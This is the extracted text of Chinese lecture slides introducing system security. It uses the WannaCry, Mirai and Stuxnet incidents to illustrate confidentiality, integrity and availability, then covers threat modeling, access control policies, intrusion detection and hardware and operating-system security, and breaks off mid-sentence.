版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
第一章緒論本章內(nèi)容提綱1.1安全事件實(shí)例1.2安全基本要素1.3安全問(wèn)題與安全系統(tǒng)1.4系統(tǒng)安全學(xué)科領(lǐng)域2015年安全事件的幾個(gè)典型數(shù)據(jù)美國(guó):365,490起中國(guó):126,916起日本:19,624起實(shí)際發(fā)生的安全事件數(shù)每年不斷攀升1.1安全事件實(shí)例Wannacry安全事件現(xiàn)象2017年5月,很多電腦出現(xiàn)右圖畫面,無(wú)法正常工作畫面文字大意:計(jì)算機(jī)中的文件已被加密,請(qǐng)?jiān)谝?guī)定時(shí)間內(nèi)向指定的地址支付相當(dāng)于300美元的比特幣,若過(guò)期未支付,所有文件將徹底丟失1.1.1Wannacry攻擊事件Wannacry的影響范圍一天之內(nèi),波及150多個(gè)國(guó)家,感染20多萬(wàn)臺(tái)計(jì)算機(jī)造成的損失約幾十億美元之間影響最嚴(yán)重的是英國(guó)和蘇格蘭的醫(yī)療系統(tǒng)約有7萬(wàn)臺(tái)設(shè)備被感染計(jì)算機(jī)、磁共振掃描機(jī)、血庫(kù)冰箱等病人無(wú)法看病,已安排好的手術(shù)無(wú)法進(jìn)行1.1.1Wannacry攻擊事件Wannacry的原理傳播部分:掃描網(wǎng)絡(luò),尋找SMB協(xié)議漏洞EternalBlue代碼打通進(jìn)入目標(biāo)系統(tǒng)的通道BoublePulsar代碼把Wannacry安裝到目標(biāo)系統(tǒng)中并啟動(dòng)它運(yùn)行勒索部分:對(duì)被感染計(jì)算機(jī)中的文件進(jìn)行加密,鎖住計(jì)算機(jī)的正常運(yùn)行顯示勒索界面,提供贖金支付接口被感染的主要是Windows7操作系統(tǒng),占98%1.1.1Wannacry攻擊事件關(guān)于SMB協(xié)議漏洞SMB(ServerMessageBlock)是Windows文件打印共享服務(wù)協(xié)議2017年3月,微軟的MS17-010安全公告說(shuō)明了SMB協(xié)議漏洞,并發(fā)布了漏洞補(bǔ)丁系統(tǒng)日常維護(hù)中未及時(shí)打安全補(bǔ)丁給Wannacry攻擊留下了可乘之機(jī)1.1.1Wannacry攻擊事件Mirai安全事件現(xiàn)象2016年10月,出現(xiàn)大半個(gè)美國(guó)斷網(wǎng)現(xiàn)象,很多知名網(wǎng)站無(wú)法訪問(wèn)涉及的網(wǎng)站:GitHub、Twitter、Reddit、Netflix和Airbnb等1.1.2Mirai攻擊事件Mirai事件的原因提供DNS服務(wù)的Dyn公司受到了DDoS攻擊域名解析示例:域名:
IP:13向Dyn發(fā)動(dòng)攻擊的是大量的網(wǎng)絡(luò)攝像頭和家庭路由器,即IoT設(shè)備IoT設(shè)備組成僵尸網(wǎng)絡(luò)(botnet)僵尸(botnet)在指揮控制服務(wù)器的統(tǒng)一指揮下向Dyn發(fā)動(dòng)DDoS攻擊1.1.2Mirai攻擊事件Mirai惡意軟件原理抓壯丁--發(fā)展僵尸掃描互聯(lián)網(wǎng),尋找那些運(yùn)行Linux操作系統(tǒng)的IoT設(shè)備嘗試以IoT設(shè)備出廠默認(rèn)賬戶進(jìn)行Telnet登錄把Mirai副本安裝到IoT設(shè)備,并將信息發(fā)給指揮控制服務(wù)器指揮僵尸作戰(zhàn)指揮控制服務(wù)器給僵尸IoT設(shè)備給命令,指示它們向Dyn發(fā)動(dòng)攻Mirai設(shè)置了不受感染的IP地址范圍美國(guó)郵政服務(wù)系統(tǒng)、國(guó)防部系統(tǒng)1.1.2Mirai攻擊事件Stuxnet安全事件現(xiàn)象從2009年底開始,伊朗納坦茲鈾濃縮工廠的離心機(jī)紛紛出現(xiàn)故障至2010年初,故障數(shù)量達(dá)到了1000臺(tái)聯(lián)合國(guó)國(guó)際原子能組織判斷:故障率遠(yuǎn)遠(yuǎn)超過(guò)了正常值伊朗納坦茲的濃縮鈾生產(chǎn)受到了沉重打擊1.1.3Stuxnet攻擊事件Stuxnet事件的真相納坦茲鈾濃縮工廠的離心機(jī)事故由Stuxnet惡意軟件所致Stuxnet隱藏在被感染的U盤中,由人工攜帶進(jìn)入工廠內(nèi)部網(wǎng)絡(luò)的計(jì)算機(jī)中Stuxnet感染工廠的SCADA系統(tǒng),在特定時(shí)間控制離心機(jī)轉(zhuǎn)速,使它們震蕩損毀精準(zhǔn)打擊:SCADA的參數(shù)與納坦茲鈾濃縮工廠高度一致時(shí),Stuxnet才啟動(dòng)破壞功能背景:Stuxnet從2005年開始研制,2009年開始發(fā)動(dòng)進(jìn)攻1.1.3Stuxnet攻擊事件鈾濃縮SCADA和Stuxnet原理Stuxnet相繼感染W(wǎng)indows、Step7、PLC,通過(guò)發(fā)給變頻器的命令控制離心機(jī)轉(zhuǎn)速1.1.3Stuxnet攻擊事件Stuxnet設(shè)計(jì)技巧利用了4個(gè)嚴(yán)重的零日漏洞,側(cè)面反映設(shè)計(jì)者漏洞資源實(shí)力雄厚利用了多種rootkit隱藏技術(shù),側(cè)面反映技術(shù)精湛用偷來(lái)的數(shù)字證書對(duì)它的驅(qū)動(dòng)程序進(jìn)行簽名,側(cè)面反應(yīng)偷盜功夫了得對(duì)納坦茲鈾濃縮工廠SCADA參數(shù)了如指掌,側(cè)面反映情報(bào)力量強(qiáng)大綜合反映:Stuxnet的開發(fā)與實(shí)施是一項(xiàng)復(fù)雜的系統(tǒng)工程,非個(gè)人所能為之1.1.3Stuxnet攻擊事件用屬性描述安全性(Security)經(jīng)典屬性:機(jī)密性(Confidentiality)完整性(Integrity)可用性(Availability)經(jīng)典要素:CIA1.2安全基本要素機(jī)密性完整性可用性一個(gè)系統(tǒng)可能擁有的屬性機(jī)密性定義機(jī)密性是指防止私密的或機(jī)密的信息泄露給非授權(quán)的實(shí)體的屬性1.2.1機(jī)密性Stuxnet事件中的機(jī)密性機(jī)密信息:伊朗納坦茲鈾濃縮工廠生產(chǎn)系統(tǒng)的技術(shù)指標(biāo)信息系統(tǒng)的網(wǎng)絡(luò)結(jié)構(gòu)、軟硬件構(gòu)成、軟件類型、設(shè)備型號(hào)等非授權(quán)實(shí)體:美國(guó)、以色列?機(jī)密性:非授權(quán)實(shí)體破壞了納坦茲鈾濃縮生產(chǎn)系統(tǒng)的機(jī)密性伊朗沒(méi)有很好地實(shí)現(xiàn)納坦茲鈾濃縮生產(chǎn)系統(tǒng)的機(jī)密性1.2.1機(jī)密性實(shí)現(xiàn)系統(tǒng)機(jī)密性的機(jī)制訪問(wèn)控制機(jī)制:阻止未獲授權(quán)的實(shí)體獲取受保護(hù)的信息加密保護(hù)機(jī)制:阻止未獲授權(quán)的實(shí)體理解受保護(hù)的信息1.2.1機(jī)密性完整性定義完整性分為數(shù)據(jù)完整性和系統(tǒng)完整性數(shù)據(jù)完整性指確保數(shù)據(jù)(包括軟件代碼)只能按照授權(quán)的指定方式進(jìn)行修改的屬性系統(tǒng)完整性指系統(tǒng)沒(méi)有受到未經(jīng)授權(quán)的操控進(jìn)而能完好無(wú)損的執(zhí)行預(yù)定功能的屬性1.2.2完整性數(shù)據(jù)的非法修改在沒(méi)有獲得授權(quán)的情況下修改數(shù)據(jù)沒(méi)有按照授權(quán)中指定的方式修改數(shù)據(jù)1.2.2完整性Stuxnet事件對(duì)完整性的破壞破壞數(shù)據(jù)完整性Windows操作系統(tǒng)、SCADA應(yīng)用軟件、PLC設(shè)備被非法植入了惡意軟件破壞系統(tǒng)完整性PLC設(shè)備受到惡意操控,導(dǎo)致離心機(jī)轉(zhuǎn)速異常并損壞PLC設(shè)備與SCADA間的通信受到非法操控,離心機(jī)狀態(tài)無(wú)法正常顯示,導(dǎo)致異常無(wú)法得到及時(shí)處理1.2.2完整性完整性的支撐機(jī)制預(yù)防機(jī)制:阻止非法修改數(shù)據(jù)或非法操控系統(tǒng)檢測(cè)機(jī)制:判斷完整性是否受到破壞1.2.2完整性可用性定義可用性是指確保系統(tǒng)及時(shí)工作并向授權(quán)用戶提供所需服務(wù)的屬性1.2.3可用性Wannacry和Mirai事件破壞可用性Wannacry對(duì)受感染機(jī)器上的文件進(jìn)行了加密,是機(jī)器無(wú)法正常工作Mirai對(duì)Dyn發(fā)動(dòng)DDoS攻擊,導(dǎo)致Dyn無(wú)法正常工作Dyn可用性被破壞,導(dǎo)致多個(gè)知名網(wǎng)站無(wú)法正常工作1.2.3可用性從安全問(wèn)題到安全系統(tǒng)安全系統(tǒng)的建設(shè)應(yīng)遵循從現(xiàn)實(shí)社會(huì)需求到計(jì)算技術(shù)需求的發(fā)展過(guò)程1.3安全問(wèn)題與安全系統(tǒng)網(wǎng)絡(luò)空間中的安全系統(tǒng)建設(shè)過(guò)程概括從分析現(xiàn)實(shí)安全問(wèn)題開始結(jié)合現(xiàn)實(shí)環(huán)境和現(xiàn)實(shí)目標(biāo),制定現(xiàn)實(shí)安全策略加上計(jì)算環(huán)境因素,形成安全策略把安全策略表示成精確的安全模型根據(jù)安全模型設(shè)計(jì)出便于實(shí)現(xiàn)的安全機(jī)制實(shí)現(xiàn)安全機(jī)制,開發(fā)出安全系統(tǒng)1.3安全問(wèn)題與安全系統(tǒng)計(jì)算環(huán)境中的概念安全策略安全模型安全機(jī)制安全系統(tǒng)我國(guó)信息安全專業(yè)的簡(jiǎn)要發(fā)展歷程本科專業(yè):2001年設(shè)立博士點(diǎn)、博士后流動(dòng)站:2003年設(shè)立教育部高等學(xué)校信息安全類專業(yè)教學(xué)指導(dǎo)委員會(huì):2007年建立《高等學(xué)校信息安全專業(yè)指導(dǎo)性專業(yè)規(guī)范》:2014年出版1.4.1我國(guó)信息安全專業(yè)我國(guó)信息安全專業(yè)規(guī)范劃分的知識(shí)領(lǐng)域信息科學(xué)基礎(chǔ)信息安全基礎(chǔ)密碼學(xué)網(wǎng)絡(luò)安全信息系統(tǒng)安全信息內(nèi)容安全1.4.1我國(guó)信息安全專業(yè)我國(guó)網(wǎng)絡(luò)空間安全學(xué)科發(fā)展情況2015年,設(shè)立網(wǎng)絡(luò)空間安全一級(jí)學(xué)科2016年,首批29所高校獲得網(wǎng)絡(luò)空間安全一級(jí)學(xué)科博士點(diǎn)資格2017年,首批7所高校入選一流網(wǎng)絡(luò)安全學(xué)院建設(shè)示范項(xiàng)目2019年,入選一流網(wǎng)絡(luò)安全學(xué)院建設(shè)示范項(xiàng)目的高校增加至11所1.4.2我國(guó)網(wǎng)絡(luò)空間安全學(xué)科計(jì)算學(xué)科知識(shí)體系建設(shè)積累1965年,ACM啟動(dòng)大學(xué)計(jì)算學(xué)科知識(shí)體系建設(shè)項(xiàng)目1968年,發(fā)布第一個(gè)計(jì)算學(xué)科(即計(jì)算機(jī)科學(xué)學(xué)科)的知識(shí)體系指南到2013年為止,ACM和IEEE-CS已聯(lián)合發(fā)布了五個(gè)計(jì)算學(xué)科的知識(shí)體系指南計(jì)算機(jī)科學(xué)計(jì)算機(jī)工程軟件工程信息系統(tǒng)信息技術(shù)1.4.3國(guó)際網(wǎng)絡(luò)空間安全學(xué)科體系網(wǎng)絡(luò)空間安全學(xué)科知識(shí)體系的發(fā)布2018年,多個(gè)國(guó)際組織聯(lián)合發(fā)布了第一個(gè)網(wǎng)絡(luò)空間安全學(xué)科知識(shí)體系CSEC2017ACM(美國(guó)計(jì)算機(jī)學(xué)會(huì))IEEE-CS(電子電氣工程師協(xié)會(huì)旗下的計(jì)算機(jī)學(xué)會(huì))AISSIGSEC(信息系統(tǒng)協(xié)會(huì)安全專業(yè)工作組)IFIPWG11.8(國(guó)際信息處理聯(lián)合會(huì)信息安全教育技術(shù)委員會(huì))35個(gè)國(guó)家的300多人為CSEC2017的開發(fā)做出了貢獻(xiàn)1.4.3國(guó)際網(wǎng)絡(luò)空間安全學(xué)科體系網(wǎng)絡(luò)空間安全學(xué)科知識(shí)體系的架構(gòu)CSEC2017以計(jì)算學(xué)科為基礎(chǔ),把網(wǎng)絡(luò)空間安全學(xué)科知識(shí)體系劃分為八大知識(shí)領(lǐng)域系統(tǒng)安全是其中之一1.4.3國(guó)際網(wǎng)絡(luò)空間安全學(xué)科體系問(wèn)題?20xx-20xx學(xué)年x季學(xué)期第二章系統(tǒng)安全基礎(chǔ)系統(tǒng)安全的兩層含義以系統(tǒng)思維應(yīng)對(duì)安全問(wèn)題應(yīng)對(duì)系統(tǒng)所面臨的安全問(wèn)題本章內(nèi)容提綱2.1系統(tǒng)安全概述2.2系統(tǒng)安全原理2.3系統(tǒng)安全結(jié)構(gòu)系統(tǒng)安全發(fā)展足跡二十世紀(jì)四十年代:第一臺(tái)計(jì)算機(jī)五十年代:第一個(gè)操作系統(tǒng)六十年代:第一個(gè)分時(shí)系統(tǒng)CTSS,第一個(gè)安全操作系統(tǒng)Adept-50,ARPANET七十年代:訪問(wèn)監(jiān)控器,訪問(wèn)驗(yàn)證機(jī)制,安全核,可信計(jì)算基,Internet興起八十年代:WWW出現(xiàn)九十年代:Internet普及,系統(tǒng)安全拓展到網(wǎng)絡(luò)互連場(chǎng)景二十一世紀(jì)安全生態(tài)系統(tǒng)2.1.1系統(tǒng)安全的演進(jìn)大自然中的系統(tǒng)整個(gè)宇宙是一個(gè)大系統(tǒng),一個(gè)地球、一個(gè)國(guó)家、一座山、一條河、一個(gè)生物、一個(gè)細(xì)胞、一個(gè)分子,等等,分別都是一個(gè)系統(tǒng)。2.1.2系統(tǒng)與系統(tǒng)安全網(wǎng)絡(luò)空間中的系統(tǒng)整個(gè)互聯(lián)網(wǎng)是一個(gè)系統(tǒng),一個(gè)網(wǎng)購(gòu)平臺(tái)、一個(gè)聊天平臺(tái)、一個(gè)校園網(wǎng)、一臺(tái)計(jì)算機(jī)、一部手機(jī),等等,分別也都是一個(gè)系統(tǒng)。2.1.2系統(tǒng)與系統(tǒng)安全系統(tǒng)的描述性定義一個(gè)系統(tǒng)(System)是由相互作用或相互依賴的元素或成份構(gòu)成的某種類型的一個(gè)統(tǒng)一整體,其中的元素完整地關(guān)聯(lián)在一起,它們之間的這種關(guān)聯(lián)關(guān)系有別于它們與系統(tǒng)外其它元素之間可能存在的關(guān)系。2.1.2系統(tǒng)與系統(tǒng)安全系統(tǒng)的元素與環(huán)境位于系統(tǒng)邊界內(nèi)部的元素屬于系統(tǒng)的組成元素位于系統(tǒng)邊界外部的元素屬于系統(tǒng)的環(huán)境2.1.2系統(tǒng)與系統(tǒng)安全觀察系統(tǒng)的方法自外觀察法:觀察者位于系統(tǒng)之外對(duì)系統(tǒng)進(jìn)行觀察通常是通過(guò)觀察系統(tǒng)的輸入和輸出來(lái)分析系統(tǒng)的行為自內(nèi)觀察法:觀察者位于系統(tǒng)之內(nèi)對(duì)系統(tǒng)進(jìn)行觀察,此時(shí),觀察者屬于系統(tǒng)的一個(gè)組成部分通常是通過(guò)觀察系統(tǒng)的外部環(huán)境來(lái)分析系統(tǒng)的行為2.1.2系統(tǒng)與系統(tǒng)安全在網(wǎng)絡(luò)空間中觀察系統(tǒng)的環(huán)境系統(tǒng)在風(fēng)險(xiǎn)的包圍之中,必須具有一定的安全性,才能正常運(yùn)轉(zhuǎn)系統(tǒng)的安全性需要以系統(tǒng)化的視野去觀察2.1.2系統(tǒng)與系統(tǒng)安全系統(tǒng)研究的方法:還原論把大系統(tǒng)分解為小系統(tǒng),然后通過(guò)對(duì)小系統(tǒng)的研究去推知大系統(tǒng)的行為把系統(tǒng)分解成它的組成部分,通過(guò)對(duì)系統(tǒng)的組成部分的研究去了解原有系統(tǒng)的情況2.1.3整體論與還原論還原論應(yīng)用示例機(jī)械手表的還原:很多機(jī)械零部件人的還原:頭、頸、軀干、四肢2.1.3整體論與還原論還原中遇到的問(wèn)題鹽=氯化鈉=氯元素+鈉元素氯元素
劇毒鈉元素
劇毒鹽
劇毒2.1.3整體論與還原論還原中的困惑人的還原方法1:頭、頸、軀干、四肢人的還原方法2:皮膚、肌肉、骨骼、內(nèi)臟、血液循環(huán)系統(tǒng)、神經(jīng)系統(tǒng)問(wèn)題:愛因斯坦的成就=?2.1.3整體論與還原論系統(tǒng)研究的方法:整體論把一個(gè)系統(tǒng)看成一個(gè)完整的統(tǒng)一體,一個(gè)完整的被觀察單位,而不是簡(jiǎn)單的微觀組成元素的集合。2.1.3整體論與還原論系統(tǒng)的宏觀特性整體特性:綜合特性、涌現(xiàn)性綜合特性:可以分解為系統(tǒng)組成部分的特性例:鹽的重量涌現(xiàn)性:不可還原(即不可分解)為系統(tǒng)組成部分的特性例:鹽的毒性2.1.3整體論與還原論安全性屬于涌現(xiàn)性以操作系統(tǒng)和機(jī)密性為例:操作系統(tǒng)的分解:進(jìn)程管理、內(nèi)存管理、外設(shè)管理、文件管理、處理器管理分析:就算各個(gè)子系統(tǒng)都能確保不泄露信息某些子系統(tǒng)的相互作用也可能泄露信息2.1.3整體論與還原論方法論評(píng)析事例:甲對(duì)一個(gè)系統(tǒng)的整體特性進(jìn)行了分析,他總結(jié)說(shuō):“通過(guò)運(yùn)用整體論,我們對(duì)這個(gè)系統(tǒng)有了很好的了解”。乙認(rèn)為甲并沒(méi)有從整體論角度分析問(wèn)題。討論:你認(rèn)為甲和乙誰(shuí)對(duì)誰(shuí)錯(cuò)?2.1.3整體論與還原論生命周期(LifeCycle)人(自然系統(tǒng))的一生:出生、成長(zhǎng)、成熟、衰老、死亡計(jì)算機(jī)(人工系統(tǒng))的一生:系統(tǒng)需要、系統(tǒng)分析、系統(tǒng)建模與設(shè)計(jì)、系統(tǒng)構(gòu)建與測(cè)試、系統(tǒng)使用與老化、系統(tǒng)報(bào)廢2.1.4系統(tǒng)安全思維幸福與可信人幸福與否:人生各個(gè)階段是否平安順利人工系統(tǒng)是否值得信賴(可信):系統(tǒng)生命周期各階段的使命的完成是否有保障2.1.4系統(tǒng)安全思維系統(tǒng)工程(SystemsEngineering)涵蓋系統(tǒng)生命周期的具有關(guān)聯(lián)活動(dòng)和任務(wù)的技術(shù)性和非技術(shù)性過(guò)程的集合技術(shù)性過(guò)程應(yīng)用工程分析與設(shè)計(jì)原則去建設(shè)系統(tǒng)非技術(shù)性過(guò)程通過(guò)工程管理去保障系統(tǒng)建設(shè)工程項(xiàng)目的順利實(shí)施2.1.4系統(tǒng)安全思維系統(tǒng)安全工程(SystemsSecurityEngineering)把安全性相關(guān)活動(dòng)和任務(wù)融合到系統(tǒng)工程的過(guò)程之中,形成的一個(gè)系統(tǒng)工程專業(yè)分支它力求從系統(tǒng)生命周期的全過(guò)程去保障系統(tǒng)的安全性2.1.4系統(tǒng)安全思維系統(tǒng)安全思維運(yùn)用整體論思想分析安全問(wèn)題在系統(tǒng)的全生命周期中衡量系統(tǒng)的安全性通過(guò)系統(tǒng)安全工程措施建立和維護(hù)系統(tǒng)的安全性2.1.4系統(tǒng)安全思維在系統(tǒng)的設(shè)計(jì)與實(shí)現(xiàn)中應(yīng)遵守的原則2.2.1基本原則限制性原則簡(jiǎn)單性原則方法性原則最小特權(quán)原則失敗-保險(xiǎn)默認(rèn)原則完全仲裁原則特權(quán)分離原則信任最小化原則機(jī)制經(jīng)濟(jì)性原則公共機(jī)制最小化原則最小驚訝原則公開設(shè)計(jì)原則層次化原則抽象化原則模塊化原則完全關(guān)聯(lián)原則設(shè)計(jì)迭代原則威脅、風(fēng)險(xiǎn)與安全威脅(Threat):給某物造成傷害或損失的意圖風(fēng)險(xiǎn)(Risk):某物遭受傷害或損失的可能性安全(Security):某物能避免或抵御他物帶來(lái)的潛在傷害或損失2.2.2威脅建模某物他物傷害或損失施加抗擊安全威脅安全概念研討場(chǎng)景:某鄉(xiāng)村一農(nóng)舍門口有一條狗,一路人需從該門口經(jīng)過(guò)。討論:威脅、風(fēng)險(xiǎn)、安全狀況如何?2.2.2威脅建模安全概念概括討論請(qǐng)闡明以下哪一個(gè)說(shuō)法正確:安全是一種屬性安全是一種能力安全是一種狀態(tài)2.2.2威脅建模威脅建模(ThreatModeling)標(biāo)識(shí)潛在安全威脅并審視風(fēng)險(xiǎn)緩解途徑的過(guò)程2.2.2威脅建模威脅建模的目的在明確了系統(tǒng)的本質(zhì)特征潛在攻擊者的基本情況最有可能的被攻擊角度攻擊者最想得到的好處的情況下,為防御者提供系統(tǒng)地分析應(yīng)采取的控制或防御措施的機(jī)會(huì)2.2.2威脅建模威脅建模要回答的主要問(wèn)題主要問(wèn)題:被攻擊的最薄弱之處在哪?最相關(guān)的攻擊是什么?為應(yīng)對(duì)這些攻擊應(yīng)該怎么做?2.2.2威脅建模Adept-50系統(tǒng)示例:涉密信息泄露違反涉密等級(jí)規(guī)定訪問(wèn)涉密信息按照低水標(biāo)模型實(shí)行訪問(wèn)控制威脅建模方法基本類型:以風(fēng)險(xiǎn)為中心以資產(chǎn)為中心以攻擊者為中心以軟件為中心2.2.2威脅建模典型方法:STRIDEPASTATrikeVAST威脅建模過(guò)程主要環(huán)節(jié):勾畫系統(tǒng)的抽象模型對(duì)模型進(jìn)行可視化表示標(biāo)識(shí)和列舉潛在威脅制定風(fēng)險(xiǎn)緩解對(duì)策2.2.2威脅建模可視化示例:基于數(shù)據(jù)流圖的表示2.2.2威脅建模訪問(wèn)行為的形式化表示(s,o,p)s----主體o----客體p----操作典型操作:read、copy、modify、execute2.2.3安全控制授權(quán)的矩陣表示2.2.3安全控制osms----主體,o----客體,m----操作權(quán)限的集合,例如,m={read,write}矩陣M訪問(wèn)控制策略1構(gòu)造訪問(wèn)控制矩陣
M,給矩陣
M
中的元素賦值,對(duì)于任意
(s,o,p)訪問(wèn)請(qǐng)求,在
M
中找到
s和
o
交叉位置上的元素
m,當(dāng)
p∈m
時(shí),允許
(s,o,p)執(zhí)行,否則,禁止
(s,o,p)執(zhí)行。2.2.3安全控制微調(diào)的授權(quán)矩陣表示2.2.3安全控制ormr----角色,o----客體,m----操作權(quán)限的集合,例如,m={read,write}矩陣MR訪問(wèn)控制策略2構(gòu)造訪問(wèn)控制矩陣
MR,設(shè)計(jì)角色分配方案
fR,給矩陣
MR
中的元素賦值,按方案
fR給每個(gè)用戶分配角色,對(duì)于任意
(u,o,p)訪問(wèn)請(qǐng)求,u
表示用戶,確定角色
r=fR(u),在
MR
中找到
r和
o
交叉位置上的元素
m,當(dāng)
p∈m
時(shí),允許
(u,o,p)執(zhí)行,否則,禁止
(u,o,p)執(zhí)行。2.2.3安全控制訪問(wèn)控制策略3制定主體等級(jí)分配方案
fS和客體密級(jí)分配方案
fO,設(shè)計(jì)主體等級(jí)與客體密級(jí)的對(duì)比方法cmp,設(shè)定任意操作
x
應(yīng)該滿足的條件
con(x),給每個(gè)主體分配涉密等級(jí),給每個(gè)客體分配保密級(jí)別,對(duì)于任意
(s,o,p)訪問(wèn)請(qǐng)求,當(dāng)
cmp(fS(s),fO(o))滿足條件
con(p)
時(shí),允許(s,o,p)執(zhí)行,否則,禁止
(s,o,p)執(zhí)行。2.2.3安全控制訪問(wèn)控制的分類分類方法一:基于身份的訪問(wèn)控制,如策略1基于角色的訪問(wèn)控制,如策略2基于標(biāo)簽的訪問(wèn)控制,如策略32.2.3安全控制分類方法二:自主訪問(wèn)控制,如策略1強(qiáng)制訪問(wèn)控制,如策略3系統(tǒng)完整性檢查從開機(jī)引導(dǎo)到應(yīng)用運(yùn)行,各個(gè)環(huán)節(jié)都進(jìn)行檢查,幫助發(fā)現(xiàn)系統(tǒng)中是否有重要組成部分受到篡改或破壞2.2.4安全監(jiān)測(cè)病毒查殺和惡意軟件檢測(cè)對(duì)系統(tǒng)中的各種文件進(jìn)行掃描,幫助發(fā)現(xiàn)或清除進(jìn)入到系統(tǒng)之中的大多數(shù)病毒或惡意軟件2.2.4安全監(jiān)測(cè)入侵檢測(cè)對(duì)惡意行為或違反安全策略的現(xiàn)象進(jìn)行監(jiān)測(cè)一旦發(fā)現(xiàn)情況就及時(shí)報(bào)告必要時(shí)發(fā)出告警2.2.4安全監(jiān)測(cè)入侵檢測(cè)分類:基于監(jiān)測(cè)對(duì)象主機(jī)入侵檢測(cè)運(yùn)行在單臺(tái)主機(jī)或設(shè)備上,對(duì)流入和流出主機(jī)或設(shè)備的數(shù)據(jù)包進(jìn)行監(jiān)測(cè)網(wǎng)絡(luò)入侵檢測(cè)部署在網(wǎng)絡(luò)策略性節(jié)點(diǎn)上,對(duì)所有設(shè)備的流出和流入流量進(jìn)行監(jiān)測(cè),對(duì)整個(gè)子網(wǎng)的流量進(jìn)行分析2.2.4安全監(jiān)測(cè)入侵檢測(cè)分類:基于檢測(cè)方法基于特征的入侵檢測(cè)從已知的入侵中提煉出特定的模式,從被檢測(cè)對(duì)象中尋找已知入侵所具有的模式基于異常的入侵檢測(cè)給可信的行為建模,把待檢測(cè)的行為與已知的可信行為模型對(duì)比2.2.4安全監(jiān)測(cè)安全管理(SecurityManagement)把一個(gè)組織的資產(chǎn)標(biāo)識(shí)出來(lái),并制定、說(shuō)明和實(shí)施保護(hù)這些資產(chǎn)的策略和流程資產(chǎn):系統(tǒng)、信息、機(jī)器、建筑物、人員2.2.5安全管理安全風(fēng)險(xiǎn)管理把風(fēng)險(xiǎn)管理原則應(yīng)用到安全威脅管理之中標(biāo)識(shí)威脅評(píng)估現(xiàn)有威脅控制措施的有效性確定風(fēng)險(xiǎn)的后果基于可能性和影響的評(píng)級(jí)排定風(fēng)險(xiǎn)優(yōu)先級(jí)劃分風(fēng)險(xiǎn)類型并選擇合適的風(fēng)險(xiǎn)策略或風(fēng)險(xiǎn)響應(yīng)2.2.5安全管理系統(tǒng)安全中的安全管理把安全理念貫穿到系統(tǒng)日常管理工作的全過(guò)程從系統(tǒng)管理的角度提升系統(tǒng)的安全性2.2.5安全管理日常安全管理工作執(zhí)行規(guī)范的管理流程,推進(jìn)以下工作:搞清需求了解模型編寫指南安裝系統(tǒng)2.2.5安全管理運(yùn)用模型指導(dǎo)操作持續(xù)應(yīng)對(duì)自動(dòng)化運(yùn)作運(yùn)用技術(shù)提升管理水平運(yùn)用數(shù)據(jù)挖掘技術(shù)幫助發(fā)現(xiàn)漏洞運(yùn)用數(shù)據(jù)分析技術(shù)感知安全態(tài)勢(shì)運(yùn)用機(jī)器學(xué)習(xí)技術(shù)幫助進(jìn)行自動(dòng)防御2.2.5安全管理從體系結(jié)構(gòu)角度看安全2.3系統(tǒng)安全結(jié)構(gòu)人操作系統(tǒng)硬件數(shù)據(jù)庫(kù)應(yīng)用機(jī)器支撐依賴
生態(tài)系統(tǒng)內(nèi)核態(tài)/用戶態(tài)討論背景:處理器硬件從可用指令集和可用內(nèi)存區(qū)域兩個(gè)方面出發(fā),定義了處理器工作的兩種狀態(tài):內(nèi)核態(tài)和用戶態(tài)討論:處理器的這種功能是如何為保護(hù)操作系統(tǒng)提供幫助的?2.3.1硬件系統(tǒng)安全檢查程序是否被篡改的基本方法第一步:計(jì)算程序的摘要unsignedchar*SHA1(constunsignedchar*d,unsignedlongn,unsignedchar*md);第二步:與原始摘要對(duì)比intstrcmp(constchar*s1,constchar*s2);問(wèn)題:程序SHA1
和strcmp
被篡改怎么辦?2.3.1硬件系統(tǒng)安全硬件防篡改解決方案在硬件中實(shí)現(xiàn)SHA1
和strcmp
等功能2.3.1硬件系統(tǒng)安全硬件基本安全支持提供密碼計(jì)算功能通用處理器提供密碼運(yùn)算指令獨(dú)立的安全密碼處理器,或稱為密碼加速器提供數(shù)字指紋用物理不可克隆函數(shù)硬件器件實(shí)現(xiàn)2.3.1硬件系統(tǒng)安全硬件木馬對(duì)集成電路芯片中的電路系統(tǒng)進(jìn)行的惡意修改,帶來(lái)的威脅:繞開或關(guān)閉系統(tǒng)的安全防線泄漏機(jī)密信息停止、擾亂或破壞芯片功能使整個(gè)芯片不能工作2.3.1硬件系統(tǒng)安全硬件木馬被植入計(jì)算機(jī)中的方式被預(yù)置在基礎(chǔ)的集成電路之中當(dāng)基礎(chǔ)集成電路被用于構(gòu)造計(jì)算機(jī)芯片時(shí),進(jìn)入計(jì)算機(jī)芯片中由計(jì)算機(jī)芯片設(shè)計(jì)企業(yè)的內(nèi)部職員插入到計(jì)算機(jī)芯片之中2.3.1硬件系統(tǒng)安全一個(gè)應(yīng)用安全需求場(chǎng)景需求:應(yīng)用程序?qū)?shù)據(jù)進(jìn)行加密保護(hù)條件:有硬件的加密功能、密鑰生成功能假設(shè):不考慮操作系統(tǒng)提供的安全幫助思考:應(yīng)用程序能否完成數(shù)據(jù)保護(hù)任務(wù)2.3.2操作系統(tǒng)安全加密功能的啟動(dòng)和使用2.3.2操作系統(tǒng)安全應(yīng)用層操作系統(tǒng)層硬件層加密功能應(yīng)用啟動(dòng)(1)應(yīng)用層操作系統(tǒng)層硬件層加密功能應(yīng)用傳輸數(shù)據(jù)(2)正常情形應(yīng)用層操作系統(tǒng)層硬件層加密功能應(yīng)用(1)應(yīng)用層操作系統(tǒng)層硬件層加密功能應(yīng)用(2)異常情形惡意應(yīng)用X加密功能的濫用2.3.2操作系統(tǒng)安全應(yīng)用層操作系統(tǒng)層硬件層加密功能應(yīng)用建立會(huì)話(1)應(yīng)用層操作系統(tǒng)層硬件層加密功能應(yīng)用使用會(huì)話(2)正常情形異常情形應(yīng)用層操作系統(tǒng)層硬件層加密功能應(yīng)用(1)應(yīng)用層操作系統(tǒng)層硬件層加密功能應(yīng)用(2)冒牌應(yīng)用操作系統(tǒng)可以幫上的忙在應(yīng)用與硬件功能之間建立可信路徑2.3.2操作系統(tǒng)安全應(yīng)用層操作系統(tǒng)層硬件層應(yīng)用加密功能可信路徑用戶管理與身份認(rèn)證注冊(cè)用戶檔案:賬戶名+賬戶標(biāo)識(shí)+口令用戶分組用戶登錄過(guò)程:賬戶名+口令2.3.2操作系統(tǒng)安全自主訪問(wèn)控制文件的擁有者可以自主確定任何用戶對(duì)